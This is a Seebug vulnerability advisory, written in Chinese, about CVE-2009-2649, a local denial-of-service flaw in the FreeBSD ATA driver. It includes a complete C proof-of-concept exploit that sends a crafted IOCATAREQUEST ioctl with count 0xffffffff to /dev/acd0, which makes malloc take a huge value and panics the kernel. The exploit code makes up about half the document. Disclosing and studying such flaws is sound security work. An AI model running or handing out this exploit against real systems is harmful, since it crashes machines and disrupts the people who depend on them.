FreeBSD IATA驱动本地拒绝服务漏洞

2009-07-31T00:00:00
ID SSV:11957
Type seebug
Reporter Root
Modified 2009-07-31T00:00:00

Description

CVE(CAN) ID: CVE-2009-2649

FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统。

FreeBSD所使用的IATA(ATA)驱动中存在安全漏洞。如果本地用户能够读访问/dev的话,就可以通过特制的IOCTL请求触发用很大的值调用malloc,导致内核忙碌。

FreeBSD FreeBSD 8.0 FreeBSD FreeBSD 6.0 厂商补丁:

FreeBSD

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.freebsd.org/security/index.html

                                        
                                            
                                                /* atapanic.c
 *
 * by Shaun Colley, 13 July 2009
 *
 * this panics the freebsd kernel by passing a large value to malloc(9) in one of
 * fbsd's ata ioctl's.  tested on freebsd 6.0 and 8.0.  you need read access to the
 * ata device in /dev to be able to open() the device.  chain with some race condition
 * bug?
 *
 * - shaun
 *
 */


#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <fcntl.h>

struct ata_ioc_requestz {
    union {
	struct {
	    u_int8_t            command;
	    u_int8_t            feature;
	    u_int64_t           lba;
	    u_int16_t           count;
	} ata;
	struct {
	    char                ccb[16];
	} atapi;
    } u;

    caddr_t             data;
    int                 count;
    int                 flags;

    int                 timeout;
    int                 error;
};


#define IOCATAREQUEST           _IOWR('a', 100, struct ata_ioc_requestz)

int main() {

struct ata_ioc_requestz evil;
int fd;

evil.count = 0xffffffff;
fd = open("/dev/acd0", O_RDONLY);  /* /dev/acd0 is one of my ata devices */

ioctl(fd, IOCATAREQUEST, &evil);

/* should never reach here if kernel panics */
return 0;    
}